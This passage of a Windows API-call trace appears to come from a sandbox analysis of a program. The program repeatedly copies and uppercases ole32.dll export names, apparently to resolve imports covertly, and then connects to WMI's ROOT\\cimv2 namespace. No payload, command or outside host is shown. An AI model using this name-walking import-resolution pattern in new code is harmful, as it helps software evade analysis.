lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0090.232] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0090.232] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0090.232] lstrlenA (lpString="COBUILDVERSION") returned 14 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0090.233] lstrlenA (lpString="COCANCELCALL") returned 12 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0090.233] lstrlenA (lpString="COCOPYPROXY") returned 11 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0090.233] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0090.233] lstrlenA (lpString="COCREATEGUID") returned 12 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0090.233] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0090.233] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0090.233] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0090.233] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0090.233] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0090.233] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0090.233] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0090.233] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0090.233] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0090.233] lstrlenA (lpString="COFILETIMENOW") returned 13 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0090.233] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0090.233] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0090.233] lstrlenA (lpString="COFREELIBRARY") returned 13 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0090.233] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0090.233] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0090.233] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0090.234] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0090.234] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0090.234] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0090.234] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0090.234] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0090.234] lstrlenA (lpString="COGETCALLERTID") returned 14 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0090.234] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0090.234] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0090.234] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0090.234] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0090.234] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0090.234] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0090.234] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0090.234] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0090.234] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0090.234] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0090.234] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0090.234] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0090.234] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0090.235] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0090.235] lstrlenA (lpString="COGETMALLOC") returned 11 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0090.235] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0090.235] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0090.235] lstrlenA (lpString="COGETOBJECT") returned 11 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0090.235] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0090.235] lstrlenA (lpString="COGETPSCLSID") returned 12 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0090.235] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0090.235] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0090.235] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0090.235] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0090.235] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0090.235] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0090.235] lstrlenA (lpString="COINITIALIZE") returned 12 [0090.235] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0090.235] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0090.235] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0090.235] lstrlenA (lpString="ole32.dll") returned 9 [0090.236] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0090.236] lstrlenA (lpString="BINDMONIKER") returned 11 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0090.236] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0090.236] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0090.236] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0090.236] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0090.236] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0090.236] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0090.236] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0090.236] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0090.236] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0090.236] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0090.236] lstrlenA (lpString="COBUILDVERSION") returned 14 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0090.236] lstrlenA (lpString="COCANCELCALL") returned 12 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0090.236] lstrlenA (lpString="COCOPYPROXY") returned 11 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0090.236] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0090.236] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0090.237] lstrlenA (lpString="COCREATEGUID") returned 12 [0090.237] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0090.237] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0090.237] CoCreateInstance (in: rclsid=0xb6d64*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xb6d54*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xc9f198 | out: ppv=0xc9f198*=0x31cff8) returned 0x0 [0090.237] WbemContext:IWbemContext:SetValue (This=0x31cff8, wszName="__ProviderArchitecture", lFlags=0, pValue=0xc9f1a8*(varType=0x3, wReserved1=0xc9, wReserved2=0x24, wReserved3=0x0, varVal1=0x40, varVal2=0xc9f684)) returned 0x0 [0090.237] lstrlenA (lpString="ole32.dll") returned 9 [0090.238] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0090.238] lstrlenA (lpString="BINDMONIKER") returned 11 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0090.238] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0090.238] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0090.238] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0090.238] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0090.238] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0090.238] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0090.238] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0090.238] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0090.238] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0090.238] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0090.238] lstrlenA (lpString="COBUILDVERSION") returned 14 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0090.238] lstrlenA (lpString="COCANCELCALL") returned 12 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0090.238] lstrlenA (lpString="COCOPYPROXY") returned 11 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0090.238] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0090.238] lstrlenA (lpString="COCREATEGUID") returned 12 [0090.238] lstrcpyA (in: lpString1=0xc9e4f4, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0090.238] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0090.239] CoCreateInstance (in: rclsid=0xb6d74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0xb6d84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xc9f1a4 | out: ppv=0xc9f1a4*=0x310880) returned 0x0 [0090.239] WbemLocator:IWbemLocator:ConnectServer (in: This=0x310880, strNetworkResource="ROOT\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x31cff8, ppNamespace=0xc9f190 | out: ppNamespace=0xc9f190*=0x31d0e4) returned 0x0 [0090.286] lstrlenA (lpString="ole32.dll") returned 9 [0090.286] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0090.286] lstrlenA (lpString="BINDMONIKER") returned 11 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0090.286] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0090.286] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0090.286] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0090.286] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0090.286] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0090.286] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0090.286] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0090.286] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0090.286] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0090.286] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0090.287] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0090.287] lstrlenA (lpString="COBUILDVERSION") returned 14 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0090.287] lstrlenA (lpString="COCANCELCALL") returned 12 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0090.287] lstrlenA (lpString="COCOPYPROXY") returned 11 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0090.287] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0090.287] lstrlenA (lpString="COCREATEGUID") returned 12 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0090.287] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0090.287] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0090.287] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0090.287] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0090.287] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0090.287] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0090.287] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0090.287] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0090.287] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0090.287] lstrlenA (lpString="COFILETIMENOW") returned 13 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0090.287] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0090.287] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0090.287] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0090.287] lstrlenA (lpString="COFREELIBRARY") returned 13 [0090.288] lstrcpyA (in: lpString1=0xc9e4e8, lpString2="CoFreeUnusedLibraries" | out: 